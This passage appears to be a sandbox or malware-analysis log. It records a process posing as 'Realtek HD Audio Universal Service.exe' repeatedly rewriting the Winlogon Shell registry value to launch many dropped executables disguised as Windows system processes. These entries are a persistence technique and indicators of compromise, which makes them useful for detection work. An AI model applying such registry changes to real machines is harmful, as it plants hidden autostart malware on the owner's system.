Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\spoolsv.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Windows\\AppCompat\\Programs\\audiodg.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\spoolsv.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Windows\\AppCompat\\Programs\\audiodg.exe\", \"C:\\Users\\Default\\Recent\\lsm.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\spoolsv.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\spoolsv.exe\", \"C:\\Windows\\AppCompat\\Programs\\audiodg.exe\", \"C:\\Users\\Default\\Recent\\lsm.exe\", \"C:\\Users\\All Users\\Microsoft Help\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\""	Realtek HD Audio Universal Service.exe